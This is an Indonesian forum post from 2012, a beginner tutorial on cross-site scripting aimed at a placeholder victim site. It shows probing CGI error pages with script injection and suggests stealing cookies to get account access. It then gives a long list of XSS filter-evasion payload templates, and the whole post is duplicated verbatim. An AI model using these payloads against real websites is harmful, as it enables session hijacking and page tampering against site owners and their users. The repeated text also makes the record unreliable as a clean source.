02-14-2012, 02:49 PM
kmaren ane gy iseng2 mumpung bru bsa online gy,,
walau hrus menahan sakit gra2 port TCP dikepala trus kbuka.. hedeuh lebay -_-":badpc:
ane iseng browse site,,coba2 xss ech kena..
nach ane coba jelasin ap tu xss..
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client ( menurut bahasa ane sndiri)
xss hanya merubah suatu halaman site secara temporary berbeda dngan injection yg kita dapatkan akses root hingga mrubah smua na hingga index na..
script xss yg biasa ane pke :
- HTML
- JavaScript
- Active X
- Flash
tu yg ane tw dan biasa ane pke buat cri xss
ane coba jelasin yg pke javascript aj ya...
klo yg laen na tnggal coba aj tnya sma mbah google..
ane dsni coba cari/tes dri file cgi,,soal na bnyak file di cgi yg bsa dxss.. -_-"
pasti pda pernah buka web dan ad tulisan.. " 404 - data.php Not Found " ato sjenis na yg mnandakan file ato halaman dri web trsebut yg tidak ada ato nda bsa dbuka..itu krena ada na dri file cgi yg merespon klo nda ada file didalam server ato web trsebut..
untuk jelas na lngsung aj ya..
http://www.korban.com/cgi-bin/program.cg...loads.html
coba dganti jdi
http://www.korban.com/cgi-bin/program.cg...=maho.html
psti bakal nongol " 404 - data.php Not Found " ato sjenis na,,
nach kita coba dech buat tes xss na..jeng..jeng..jeng
http://www.korban.com/cgi-bin/program.cg...alert('tes Maho')</script>
klo muncul kotak popup alert berarti bsa dxss dech web na..
kunci na apakah suatu web vuln terhadap xss , masukan script <script>alert('tes')</script> didalam kolom url web tersebut,,gampang kan,,
( tw gampang bgtu pain panjang lebar jelasin na ):badpc:
Ech tpi ada tpi na ni,,Selain script itu juga xss bisa digunakan untuk mengetahui password account dengan cara <script>alert(document.cookie)</script>.
inga,,inga,,( iklan mode on ) xss bsa permanen ato temporer slama web trsebut lom dpatch,, ( mudah2an nda pernah ) amin :badpc:
masih bnyak script yg dgunakan buat xss ( sbagian dkit dpet dri googling ) -_-" :
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
Dach dlu dech tutor dri biji kya ane lebih parah dri pengguna baru ( kta om computer_geex )
:apn: piss om
mudah2an pda paham,,ane coba jelasin dngan bahasa ane sndri soal na.. -_-"
sekian ya tha2 smua na..
makasih buat zee Maho ma om xsan-lahci yg uda nemenin ane :*
walau hrus menahan sakit gra2 port TCP dikepala trus kbuka.. hedeuh lebay -_-":badpc:
ane iseng browse site,,coba2 xss ech kena..
nach ane coba jelasin ap tu xss..
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client ( menurut bahasa ane sndiri)
xss hanya merubah suatu halaman site secara temporary berbeda dngan injection yg kita dapatkan akses root hingga mrubah smua na hingga index na..
script xss yg biasa ane pke :
- HTML
- JavaScript
- Active X
- Flash
tu yg ane tw dan biasa ane pke buat cri xss
ane coba jelasin yg pke javascript aj ya...
klo yg laen na tnggal coba aj tnya sma mbah google..
ane dsni coba cari/tes dri file cgi,,soal na bnyak file di cgi yg bsa dxss.. -_-"
pasti pda pernah buka web dan ad tulisan.. " 404 - data.php Not Found " ato sjenis na yg mnandakan file ato halaman dri web trsebut yg tidak ada ato nda bsa dbuka..itu krena ada na dri file cgi yg merespon klo nda ada file didalam server ato web trsebut..
untuk jelas na lngsung aj ya..
http://www.korban.com/cgi-bin/program.cg...loads.html
coba dganti jdi
http://www.korban.com/cgi-bin/program.cg...=maho.html
psti bakal nongol " 404 - data.php Not Found " ato sjenis na,,
nach kita coba dech buat tes xss na..jeng..jeng..jeng
http://www.korban.com/cgi-bin/program.cg...alert('tes Maho')</script>
klo muncul kotak popup alert berarti bsa dxss dech web na..
kunci na apakah suatu web vuln terhadap xss , masukan script <script>alert('tes')</script> didalam kolom url web tersebut,,gampang kan,,
( tw gampang bgtu pain panjang lebar jelasin na ):badpc:
Ech tpi ada tpi na ni,,Selain script itu juga xss bisa digunakan untuk mengetahui password account dengan cara <script>alert(document.cookie)</script>.
inga,,inga,,( iklan mode on ) xss bsa permanen ato temporer slama web trsebut lom dpatch,, ( mudah2an nda pernah ) amin :badpc:
masih bnyak script yg dgunakan buat xss ( sbagian dkit dpet dri googling ) -_-" :
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
Dach dlu dech tutor dri biji kya ane lebih parah dri pengguna baru ( kta om computer_geex )
:apn: piss om
mudah2an pda paham,,ane coba jelasin dngan bahasa ane sndri soal na.. -_-"
sekian ya tha2 smua na..
makasih buat zee Maho ma om xsan-lahci yg uda nemenin ane :*